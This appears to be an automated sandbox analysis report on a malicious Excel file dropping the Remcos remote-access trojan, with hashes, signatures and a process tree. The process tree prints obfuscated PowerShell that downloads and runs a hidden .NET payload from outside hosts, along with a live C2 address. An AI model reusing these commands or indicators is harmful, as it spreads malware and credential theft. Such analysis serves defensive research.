Analysis

  • max time kernel
    151s
  • max time network
    169s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-03-2024 02:21

General

  • Target

    52b32ac1009f5633f0dee6a2305af7ccdf99c726c4757fa2bca6a0ea212d720f.xls

  • Size

    49KB

  • MD5

    fef0c51aa0af0361b8dec099ed5bafa1

  • SHA1

    94ca3c3802f4d2c28f9ef911821efae63d1d9d33

  • SHA256

    52b32ac1009f5633f0dee6a2305af7ccdf99c726c4757fa2bca6a0ea212d720f

  • SHA512

    53a37c375f74b77da1d77dec9183a204d47b9962ad7c03cfebe8d0a9479b8badf17d24c8a8d2346824f7d63d51a42d09a729af2ebc604197e77946c0d99744e3

  • SSDEEP

    768:yXyBP0/kns9iP95hIlMURQIksJW9TUCV96sIbGLRtdN+/fIFagZHTB6p:yX68/ks9iP9TILWIhJWmFCVjWfIIqTB

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

grinbush.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-XSGZ1O

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 17 IoCs
  • Detects executables built or packed with MPress PE compressor 23 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 3 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 3 IoCs
  • NirSoft MailPassView 3 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 8 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Abuses OpenXML format to download file from external location
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\52b32ac1009f5633f0dee6a2305af7ccdf99c726c4757fa2bca6a0ea212d720f.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2844
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2072
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imagainetheloverkiss.vbs"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDUDgTreNQDgTrevDgTreDkDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwByDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrewDgTreDQDgTreMQDgTrezDgTreDkDgTreOQDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre1DgTreDUDgTreLwDgTre5DgTreDkDgTreNwDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTrecgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMDgTreDgTre0DgTreDEDgTreMwDgTre5DgTreDkDgTreMwDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBvDgTreHcDgTredDgTreBoDgTreGEDgTreTQDgTrevDgTreDDgTreDgTreMwDgTrexDgTreDMDgTreLwDgTreyDgTreDgDgTreLgDgTre5DgTreDEDgTreMgDgTreuDgTreDIDgTreMwDgTreuDgTreDcDgTreMDgTreDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBTDgTreFcDgTreVwBUDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:744
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.owthaM/0313/28.912.23.702//:ptth' , '1' , 'C:\ProgramData\' , 'SWWT','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\SWWT.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2876
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:2732
              • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\faxbfvnbcbltullmygckeapuy"
                6⤵
                  PID:2236
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\faxbfvnbcbltullmygckeapuy"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1768
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\pucugoydqjdywraqhqxdhfcdzwkf"
                  6⤵
                  • Accesses Microsoft Outlook accounts
                  PID:1584
                • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zopnggrwervdgxwuqbkfsrwuilugeyiy"
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1072

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        67KB

        MD5

        753df6889fd7410a2e9fe333da83a429

        SHA1

        3c425f16e8267186061dd48ac1c77c122962456e

        SHA256

        b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

        SHA512

        9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        2f650b7507ba38fd87c3e6dbfec80421

        SHA1

        53b18b2753c119cbdda5ca3286c2865ac55cc779

        SHA256

        a2d7f80bdd4f269f66e2dd68b577c83908462c9538cf1b098062d082892378de

        SHA512

        5788caf910d68dd9682a435d14233db97b6084c85aa54aa0527a118d5d09db9a20931b642f231ef1a859db691d54d561111139385b21b7c47710a1b39a686573

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        a9744f48e15c462759ae9a7c4c7c6c85

        SHA1

        d9056fc665fc97255f1c9faab1bd9aee7cb044b9

        SHA256

        7ed7bfe5532cb1a6db8a8e4f1ac2d3cacc81aadd2a531f4d344e493c07f8ed1f

        SHA512

        f5f936b06c13f36686ff70e4a148d72395022fc39102076dac8efead9ed1adecf866c9c07605e7f6c5ff02a850fbc01973360f42844ce0ff8323ce3f4f03cc55

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{48D883D5-4DE3-4400-B1B4-29D04F4FD2EB}.FSD

        Filesize

        128KB

        MD5

        0a458f2d5611b5d2ed9f51ca1b2121c1

        SHA1

        56e9a64a9d5acaad0882be3e95848ec8e70874e5

        SHA256

        ae4980df323da99007daf326359ab5a7ed28ac9dc6b38a87918564cdd57f6aea

        SHA512

        cb5f1e7e256c6a0647f2bd5301ca3cc704e2a591d8c5c4877a7795160dd8f2a7401a8210887a8b14b595f144fc3db1f69ac251ab39ca1bb82f4405c60e475c36

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        3cdb03e821799fabdaab0c3a5213acce

        SHA1

        b99fbb7dae2578b5d7b980cd708faca016bd332e

        SHA256

        b41a75baa10a573be4086ca1fc1ed226092690d47f69ab2a0591b983f30323f8

        SHA512

        87df4faee0130d05ee5038511c2738c53a34fbc850b06e59db836d6721a786f9bd42b37d46892ef0eec2ad84e1d59f07c21e6f51f2b5da77ec798f758151d948

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{534AB806-78D5-4A8E-9DBB-BBDF58A61522}.FSD

        Filesize

        128KB

        MD5

        a201f67ddf7fd0846bc71b2c6e69ce2b

        SHA1

        174165785bfab931824926ac8c6f8c289a26d596

        SHA256

        0d5dc3739862374512f63e80d99a1d657d4edb6a98cac04aae737c0f92a6ced0

        SHA512

        07c2a04af038bb526482afba5d2277302192f969fce4b6323b7feab680081a9cd27c7165aed4469eb61656e7b3f39e0aca0886e66b0ead3f82e77ac0a9d950e7

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HQQVSTWU\imageinetheloveofactionhappenedeverytimeyoudidseetheamazingaction___weareinheretounderstandhowmuchiamlovingyou[1].doc

        Filesize

        71KB

        MD5

        8d6eb0ebe0f36b867af1c471880ce2b2

        SHA1

        253dde2309f7099e4b7fb049335160754175fda3

        SHA256

        436be17de8e60f2b4e31b01da465b470c4afbb1c9a810c095391221d1e277eca

        SHA512

        d0a6becdec4c9cab7c0cdfc04c5c44fdb718d4c05f4997d6390346cdbe7dd9f2991260f999eae460eaca44e87ec1feb6dfc7f59ea4508f5c7ebe419485564db1

      • C:\Users\Admin\AppData\Local\Temp\Cab9F0.tmp

        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

      • C:\Users\Admin\AppData\Local\Temp\TarA21.tmp

        Filesize

        171KB

        MD5

        9c0c641c06238516f27941aa1166d427

        SHA1

        64cd549fb8cf014fcd9312aa7a5b023847b6c977

        SHA256

        4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

        SHA512

        936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

      • C:\Users\Admin\AppData\Local\Temp\TarF36.tmp

        Filesize

        175KB

        MD5

        dd73cead4b93366cf3465c8cd32e2796

        SHA1

        74546226dfe9ceb8184651e920d1dbfb432b314e

        SHA256

        a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

        SHA512

        ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

      • C:\Users\Admin\AppData\Local\Temp\faxbfvnbcbltullmygckeapuy

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • C:\Users\Admin\AppData\Local\Temp\{1F5361CD-A5AA-4A7B-8612-5D0A3FB98922}

        Filesize

        128KB

        MD5

        919511d7698bb0f21016eca95c3510ea

        SHA1

        bbb5806b03078e00aca942c54927cd50ce231d24

        SHA256

